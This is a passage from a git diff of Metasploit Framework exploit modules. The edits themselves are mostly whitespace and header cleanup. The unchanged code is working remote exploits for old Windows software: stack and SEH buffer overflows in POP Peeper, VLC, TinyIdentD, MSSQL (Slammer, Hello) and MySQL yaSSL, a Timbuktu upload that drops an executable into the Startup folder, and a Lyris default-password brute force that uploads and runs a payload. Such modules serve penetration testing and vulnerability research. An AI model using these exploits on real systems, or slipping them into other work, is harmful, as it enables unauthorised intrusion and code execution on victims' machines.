[target.ret].pack('V') buffer << make_nops(10) + [0xe8, -485].pack('CV') + rand_text_english(132324) - + header = "HTTP/1.1 200 OK\r\n" header << "Content-Type: application/smil\r\n\r\n" @@ -83,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote body << "\"><P Class=\"ENUSCC\"></P></SYNC></BODY></SAMI>" sploit = header + body - + print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...") client.put(sploit) diff --git a/modules/exploits/windows/misc/poppeeper_date.rb b/modules/exploits/windows/misc/poppeeper_date.rb index 137c8f4eaf..d6294cc631 100644 --- a/modules/exploits/windows/misc/poppeeper_date.rb +++ b/modules/exploits/windows/misc/poppeeper_date.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -16,17 +20,17 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'POP Peeper v3.4 DATE Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in POP Peeper v3.4. - When a specially crafted DATE string is sent to a client, - an attacker may be able to execute arbitrary code. This - module is based off of krakowlabs code. + When a specially crafted DATE string is sent to a client, + an attacker may be able to execute arbitrary code. This + module is based off of krakowlabs code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2009-1029' ], - [ 'BID', '34093' ], + [ 'BID', '34093' ], [ 'URL', 'http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_date-bof.txt' ], ], 'DefaultOptions' => @@ -51,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The POP daemon port to listen on", 110 ]) ], self.class) end @@ -68,21 +72,21 @@ class Metasploit3 < Msf::Exploit::Remote client.put(ok) client.get_once - + ok = "+OK\r\n" client.put(ok) - + client.get_once - + ok = "+OK 1 100\r\n" client.put(ok) - + client.get_once ok = "+OK\r\n1 " + rand_text_english(4) + "\r\n.\r\n" client.put(ok) - client.get_once + client.get_once ok = "+OK 1 100\r\n.\r\n" client.put(ok) @@ -94,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit = "Date: " + rand_text_alpha_upper(132) + generate_seh_payload(target.ret) + "\r\n.\r\n" client.put(sploit) - + handler service.close_client(client) end diff --git a/modules/exploits/windows/misc/poppeeper_uidl.rb b/modules/exploits/windows/misc/poppeeper_uidl.rb index 4d6b3d3d44..b039f7a0e4 100644 --- a/modules/exploits/windows/misc/poppeeper_uidl.rb +++ b/modules/exploits/windows/misc/poppeeper_uidl.rb @@ -27,9 +27,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ - [ 'BID', '33926' ], + [ 'BID', '33926' ], [ 'URL', 'http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_uidl-bof.txt' ], ], 'DefaultOptions' => @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The POP daemon port to listen on", 110 ]) ], self.class) end @@ -71,21 +71,21 @@ class Metasploit3 < Msf::Exploit::Remote client.put(ok) client.get_once - + ok = "+OK\r\n" client.put(ok) - - client.get_once - - ok = "+OK 1 100\r\n" - client.put(ok) - + client.get_once - sploit = "+OK\r\n1 " + rand_text_alpha_upper(1072) + generate_seh_payload(target.ret) + "\r\n.\r\n" - + ok = "+OK 1 100\r\n" + client.put(ok) + + client.get_once + + sploit = "+OK\r\n1 " + rand_text_alpha_upper(1072) + generate_seh_payload(target.ret) + "\r\n.\r\n" + client.put(sploit) - + handler service.close_client(client) end diff --git a/modules/exploits/windows/misc/realtek_playlist.rb b/modules/exploits/windows/misc/realtek_playlist.rb index b93556a8cc..335dc2e8a9 100644 --- a/modules/exploits/windows/misc/realtek_playlist.rb +++ b/modules/exploits/windows/misc/realtek_playlist.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Realtek Media Player Playlist Buffer Overflow.', 'Description' => %q{ - This module exploits a stack overflow in Realtek Media Player(RtlRack) A4.06. + This module exploits a stack overflow in Realtek Media Player(RtlRack) A4.06. When a Realtek Media Player client opens a specially crafted playlist, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-5664'], [ 'OSVDB', '50715'], @@ -44,7 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => false, 'DisclosureDate' => 'Dec 16 2008', 'DefaultTarget' => 0)) - end def autofilter @@ -56,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, request) - + return if ((p = regenerate_payload(cli)) == nil) pla = rand_text_alpha_upper(200) @@ -66,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, pla, { 'Content-Type' => 'text/plain' }) - + handler(cli) end diff --git a/modules/exploits/windows/misc/shixxnote_font.rb b/modules/exploits/windows/misc/shixxnote_font.rb index 9995656587..44a95c7c8b 100644 --- a/modules/exploits/windows/misc/shixxnote_font.rb +++ b/modules/exploits/windows/misc/shixxnote_font.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -23,15 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'ShixxNOTE 6.net Font Field Overflow', 'Description' => %q{ - This module exploits a buffer overflow in ShixxNOTE 6.net. + This module exploits a buffer overflow in ShixxNOTE 6.net. The vulnerability is caused due to boundary errors in the handling of font fields. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2004-1595'], ['OSVDB', '10721'], ['BID', '11409'], @@ -47,10 +45,10 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - + 'Targets' => [ - [ 'ShixxNOTE 6.net Universal', { 'Ret' => 0x10041951 } ], + [ 'ShixxNOTE 6.net Universal', { 'Ret' => 0x10041951 } ], ], 'Privileged' => false, @@ -59,10 +57,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(2000) - ], self.class) + register_options( + [ + Opt::RPORT(2000) + ], self.class) end @@ -74,15 +72,15 @@ class Metasploit3 < Msf::Exploit::Remote sploit = rand_text_alpha_upper(8, payload_badchars) sploit += "~~" sploit += rand_text_alpha_upper(118, payload_badchars) - + seh = generate_seh_payload(target.ret) - + sploit[112, seh.length] = seh sploit += rand_text_alpha_upper(200, payload_badchars) sploit += "~" * 10 sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb index 54559e6345..0a5da3e875 100644 --- a/modules/exploits/windows/misc/talkative_response.rb +++ b/modules/exploits/windows/misc/talkative_response.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -20,13 +20,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack overflow in Talkative IRC v0.4.4.16. When a specially crafted response string is sent to a client, - an attacker may be able to execute arbitrary code. + an attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'BID', '34141' ], [ 'URL', 'http://milw0rm.com/exploits/8227' ], ], @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The IRC daemon port to listen on", 6667 ]) ], self.class) end @@ -66,12 +66,12 @@ class Metasploit3 < Msf::Exploit::Remote return if ((p = regenerate_payload(client)) == nil) sploit = ":" + rand_text_alpha_upper(272) + Rex::Arch::X86.jmp_short(6) - sploit << rand_text_alpha_upper(2) + [target.ret].pack('V') + payload.encoded + sploit << rand_text_alpha_upper(2) + [target.ret].pack('V') + payload.encoded sploit << " PRIVMSG " + rand_text_alpha(rand(10) + 1) sploit << " : /FINGER " + rand_text_alpha(rand(10) + 1) + ".\r\n" - + client.put(sploit) - + handler service.close_client(client) end diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb index f5db1f3713..e3c291515f 100644 --- a/modules/exploits/windows/misc/tiny_identd_overflow.rb +++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,13 +20,13 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'TinyIdentD 2.2 Stack Overflow', 'Description' => %q{ - This module exploits a stack based buffer overflow in TinyIdentD version 2.2. + This module exploits a stack based buffer overflow in TinyIdentD version 2.2. If we send a long string to the ident service we can overwrite the return - address and execute arbitrary code. Credit to Maarten Boone. + address and execute arbitrary code. Credit to Maarten Boone. }, 'Author' => 'Jacopo Cervini <acaro[at]jervus.it>', 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2007-2711'], ['OSVDB', '36053'], @@ -42,16 +40,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - ['Windows 2000 Server SP4 English', { 'Ret' => 0x7c2d15e7, } ], # call esi - ['Windows XP SP2 Italian', { 'Ret' => 0x77f46eda, } ], # call esi - - ], + ['Windows 2000 Server SP4 English', { 'Ret' => 0x7c2d15e7, } ], # call esi + ['Windows XP SP2 Italian', { 'Ret' => 0x77f46eda, } ], # call esi + ], 'Privileged' => false, 'DisclosureDate' => 'May 14 2007' )) - register_options([ Opt::RPORT(113) ], self.class) + register_options([ Opt::RPORT(113) ], self.class) end def exploit @@ -61,14 +58,14 @@ class Metasploit3 < Msf::Exploit::Remote pattern << make_nops(0x1eb - payload.encoded.length) pattern << payload.encoded pattern << [ target.ret ].pack('V') - + request = pattern + "\n" print_status("Trying #{target.name} using address at #{"0x%.8x" % target.ret }...") sock.put(request) - + handler disconnect diff --git a/modules/exploits/windows/misc/videolan_tivo.rb b/modules/exploits/windows/misc/videolan_tivo.rb index e40fea0387..88f0f8cdea 100644 --- a/modules/exploits/windows/misc/videolan_tivo.rb +++ b/modules/exploits/windows/misc/videolan_tivo.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,14 +20,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'VideoLAN VLC TiVo Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in VideoLAN VLC 0.9.4. - By creating a malicious TY file, a remote attacker could overflow a - buffer and execute arbitrary code. + This module exploits a buffer overflow in VideoLAN VLC 0.9.4. + By creating a malicious TY file, a remote attacker could overflow a + buffer and execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-4654' ], [ 'OSVDB', '49181' ], @@ -44,7 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => false, 'DisclosureDate' => 'Oct 22 2008', 'DefaultTarget' => 0)) - end def autofilter @@ -56,36 +59,36 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, request) - + return if ((p = regenerate_payload(cli)) == nil) - ty = "\xF5\x46\x7A\xBD" - ty << "\x00\x00\x00\x02" - ty << "\x00\x02\x00\x00" - ty << "\x00\x00\x00\x00" + ty = "\xF5\x46\x7A\xBD" + ty << "\x00\x00\x00\x02" + ty << "\x00\x02\x00\x00" ty << "\x00\x00\x00\x00" - ty << "\x00\x00\x05\x41" - ty << "\x00\x00\x00\x00" - ty << "\x00\x00\x05\x49" - ty << "\x00" * 60 + ty << "\x00\x00\x00\x00" + ty << "\x00\x00\x05\x41" + ty << "\x00\x00\x00\x00" + ty << "\x00\x00\x05\x49" + ty << "\x00" * 60 ty << "\x00" * (1024 - payload.encoded.length) + payload.encoded ty << make_nops(2) + Rex::Arch::X86.jmp_short(6) + [target.ret].pack('V') ty << make_nops(12) + [0xe8, -525].pack('CV') + "\x00" * (129931) - ty << "\x05" - ty << "\x00\x00\x00" - ty << "\x05" - ty << "\x00" - ty << "\x09" - ty << "\xc0" - ty << "\x00" * 14 - ty << "\x06" - ty << "\xe0" - ty << "\x00" * 302004 + ty << "\x05" + ty << "\x00\x00\x00" + ty << "\x05" + ty << "\x00" + ty << "\x09" + ty << "\xc0" + ty << "\x00" * 14 + ty << "\x06" + ty << "\xe0" + ty << "\x00" * 302004 print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, ty, { 'Content-Type' => 'application/octet-stream' }) - + handler(cli) end diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb index 62567273b2..d6f905bacb 100644 --- a/modules/exploits/windows/misc/windows_rsh.rb +++ b/modules/exploits/windows/misc/windows_rsh.rb @@ -11,27 +11,25 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp - def initialize(info = {}) super(update_info(info, 'Name' => 'Windows RSH daemon Buffer Overflow', 'Description' => %q{ - This module exploits a vulnerabliltiy in Windows RSH daemon 1.8. + This module exploits a vulnerabliltiy in Windows RSH daemon 1.8. The vulnerability is due to a failure to check for the length of input sent to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit - to be successful. + to be successful. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2007-4006'], ['OSVDB', '38572'], ['BID', '25044'], @@ -58,8 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jul 24 2007', 'DefaultTarget' => 0)) - register_options([Opt::RPORT(514)], self.class) - + register_options([Opt::RPORT(514)], self.class) end def exploit @@ -67,12 +64,12 @@ class Metasploit3 < Msf::Exploit::Remote sploit = (("\x00" + rand_text_english(1)) * 2) + "\x00" sploit << rand_text_english(1024) + [target.ret].pack('V') - sploit << payload.encoded - + sploit << payload.encoded + print_status("Trying target #{target.name}...") sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/motorola/timbuktu_fileupload.rb b/modules/exploits/windows/motorola/timbuktu_fileupload.rb index a6e1c4511f..51d52e68bb 100644 --- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb +++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -20,10 +24,10 @@ class Metasploit3 < Msf::Exploit::Remote Timbuktu Pro for Windows 8.6.5. }, 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, + 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2008-1117' ], [ 'OSVDB', '43544' ], ], @@ -46,12 +50,11 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'May 10 2008')) - register_options( - [ - Opt::RPORT(407), - OptString.new('PATH', [ true, 'The path to place the executable.', '\\../../../Documents and Settings/All Users/Start Menu/Programs/Startup/']), - ], self.class) - + register_options( + [ + Opt::RPORT(407), + OptString.new('PATH', [ true, 'The path to place the executable.', '\\../../../Documents and Settings/All Users/Start Menu/Programs/Startup/']), + ], self.class) end def exploit @@ -60,54 +63,54 @@ class Metasploit3 < Msf::Exploit::Remote exe = rand_text_alpha(8) + ".exe" data = Msf::Util::EXE.to_win32pe(framework, payload.encoded) - pkt1 = "\x00\x01\x6B\x00\x00\xB0\x00\x23\x07\x22\x03\x07\xD6\x69\x6D\x3B" - pkt1 << "\x27\xA8\xD0\xF2\xD6\x69\x6D\x3B\x27\xA8\xD0\xF2\x00\x09\x01\x41" - pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xB7\x1D" - pkt1 << "\xBF\x42\x00\x00\x00\x00\x7F\x00\x00\x01\x00\x00\x00\x00\x00\x00" - pkt1 << "\x00\x00\x00\x00\x00\x00" + pkt1 = "\x00\x01\x6B\x00\x00\xB0\x00\x23\x07\x22\x03\x07\xD6\x69\x6D\x3B" + pkt1 << "\x27\xA8\xD0\xF2\xD6\x69\x6D\x3B\x27\xA8\xD0\xF2\x00\x09\x01\x41" + pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xB7\x1D" + pkt1 << "\xBF\x42\x00\x00\x00\x00\x7F\x00\x00\x01\x00\x00\x00\x00\x00\x00" + pkt1 << "\x00\x00\x00\x00\x00\x00" - pkt3 = "\xFB\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xC2\x32\x94" - pkt3 << "\xCC\xC2\x32\x94\xD9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00" - pkt3 << "\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - pkt3 << "\x00\x00\x00\x00\x00\x00\x00" - pkt3 << [datastore['PATH'].length + exe.length].pack('C') + datastore['PATH'] + exe + pkt3 = "\xFB\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xC2\x32\x94" + pkt3 << "\xCC\xC2\x32\x94\xD9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00" + pkt3 << "\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + pkt3 << "\x00\x00\x00\x00\x00\x00\x00" + pkt3 << [datastore['PATH'].length + exe.length].pack('C') + datastore['PATH'] + exe + + print_status("Connecting to #{rhost} on port #{rport}...") - print_status("Connecting to #{rhost} on port #{rport}...") - sock.put(pkt1) - sleep(0.15) + sleep(0.15) - sock.put("\xFF") - sleep(0.15) + sock.put("\xFF") + sleep(0.15) - sock.put(pkt3) - sleep(0.15) + sock.put(pkt3) + sleep(0.15) - sock.put("\xF9\x00") - sleep(0.15) + sock.put("\xF9\x00") + sleep(0.15) - print_status("Sending EXE payload '#{exe}' to #{rhost}:#{rport}...") - sock.put("\xF8" + [data.length].pack('n') + data) - sleep(5) + print_status("Sending EXE payload '#{exe}' to #{rhost}:#{rport}...") + sock.put("\xF8" + [data.length].pack('n') + data) + sleep(5) - sock.put("\xF7") - sleep(0.15) + sock.put("\xF7") + sleep(0.15) - sock.put("\xFA") - sleep(0.15) + sock.put("\xFA") + sleep(0.15) - sock.put("\xFE") - sleep(0.08) + sock.put("\xFE") + sleep(0.08) + + print_status("Done!") + disconnect - print_status("Done!") - disconnect - end end diff --git a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb index f571954913..194a337851 100644 --- a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb +++ b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'Automatic', { } ], ], - 'DefaultTarget' => 0 + 'DefaultTarget' => 0 )) end @@ -50,34 +50,34 @@ class Metasploit3 < Msf::Exploit::Remote # New installations use a randomly generated suffix like "lyris629dAe536F" pass = nil - + while(true) - print_status("Trying to authenticate with password 'lminstall'...") + print_status("Trying to authenticate with password 'lminstall'...") if(mssql_login('sa', 'lminstall')) pass = 'lminstall' break end - + print_status("Trying to authenticate with passwords 'lyris1' to 'lyris65535'...") 1.upto(65535) do |pid| - + if(pid % 1000 == 0) print_status(" >> Completed #{pid} of 65535 authentication requests") end - + if(mssql_login('sa', "lyris#{pid}")) pass = "lyris#{pid}" break - end + end end print_status("This system does not appear to be exploitable") return - end - + end + print_status("") print_status("Sucessfully authenticated to #{rhost}:#{rport} with user 'sa' and password '#{pass}'") print_status("") - + mssql_upload_exec(Msf::Util::EXE.to_win32pe(framework,payload.encoded)) handler diff --git a/modules/exploits/windows/mssql/ms02_039_slammer.rb b/modules/exploits/windows/mssql/ms02_039_slammer.rb index 1f57dacd57..7785f09272 100644 --- a/modules/exploits/windows/mssql/ms02_039_slammer.rb +++ b/modules/exploits/windows/mssql/ms02_039_slammer.rb @@ -3,32 +3,30 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft SQL Server Resolution Overflow', 'Description' => %q{ - This is an exploit for the SQL Server 2000 resolution + This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3). - + }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -48,9 +46,9 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x3a\x0a\x0d\x2f\x5c", 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ - [ + [ 'MSSQL 2000 / MSDE <= SP2', { 'Platform' => 'win', @@ -61,14 +59,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'DisclosureDate' => 'Jul 24 2002', 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(1434) - ], self.class) + + register_options( + [ + Opt::RPORT(1434) + ], self.class) end - - + + def check info = mssql_ping if (info['ServerName']) @@ -82,26 +80,26 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - + connect_udp print_status(sprintf("Sending UDP packet with return address 0x%.8x", target.ret)) print_status("Execute 'net start sqlserveragent' once access is obtained"); # \x68:888 => push dword 0x3838383a buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888" - + # Return to the stack pointer buf[ 97, 4] = [target.ret].pack('V') - + # Which lands right here buf[101, 6] = make_nops(6) - + # Jumps 8 bytes ahead buf[107, 2] = "\xeb\x08" - + # Write to thread storage space to avoid a crash buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack('VV') - + # And finally into the payload buf[117,payload.encoded.length] = payload.encoded diff --git a/modules/exploits/windows/mssql/ms02_056_hello.rb b/modules/exploits/windows/mssql/ms02_056_hello.rb index 96afa5edbb..4eebfe27b3 100644 --- a/modules/exploits/windows/mssql/ms02_056_hello.rb +++ b/modules/exploits/windows/mssql/ms02_056_hello.rb @@ -3,31 +3,29 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft SQL Server Hello Overflow', 'Description' => %q{ - By sending malformed data to TCP port 1433, an + By sending malformed data to TCP port 1433, an unauthenticated remote attacker could overflow a buffer and possibly execute code on the server with SYSTEM level privileges. This module should work against any vulnerable SQL Server 2000 or MSDE install (< SP3). - + }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -47,9 +45,9 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ - [ + [ 'MSSQL 2000 / MSDE <= SP2', { 'Platform' => 'win', @@ -61,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Aug 5 2002', 'DefaultTarget' => 0)) end - + def check info = mssql_ping if (info['ServerName']) @@ -80,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02" + "\x10\x00\x00\x00" + rand_text_english(528, payload_badchars) + - "\x1B\xA5\xEE\x34" + + "\x1B\xA5\xEE\x34" + rand_text_english(4, payload_badchars) + [ target['Rets'][0] ].pack('V') + [ target['Rets'][1], target['Rets'][1] ].pack('VV') + @@ -91,9 +89,9 @@ class Metasploit3 < Msf::Exploit::Remote "\x00\x24\x01\x00\x00" sock.put(buf) - + handler disconnect end - + end diff --git a/modules/exploits/windows/mysql/mysql_yassl_hello.rb b/modules/exploits/windows/mysql/mysql_yassl_hello.rb index a9f824c044..609250d980 100644 --- a/modules/exploits/windows/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/windows/mysql/mysql_yassl_hello.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MySQL yaSSL SSL Hello Message Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the yaSSL (1.7.5 and earlier) - implementation bundled with MySQL <= 6.0. By sending a specially crafted - Hello packet, an attacker may be able to execute arbitrary code. + implementation bundled with MySQL <= 6.0. By sending a specially crafted + Hello packet, an attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -48,15 +46,15 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'MySQL 5.0.45-community-nt', { 'Ret' => 0x008b9d45 } ], - [ 'MySQL 5.1.22-rc-community', { 'Ret' => 0x008b04c9 } ], + [ 'MySQL 5.1.22-rc-community', { 'Ret' => 0x008b04c9 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 4 2008')) - - register_options([ Opt::RPORT(3306) ], self) + + register_options([ Opt::RPORT(3306) ], self) end def exploit @@ -66,20 +64,20 @@ class Metasploit3 < Msf::Exploit::Remote req_uno = [0x01000020].pack('V') - req_dos = [0x00008daa].pack('V') + [0x40000000].pack('V') - req_dos << [0x00000008].pack('V') + [0x00000000].pack('V') - req_dos << [0x00000000].pack('V') + 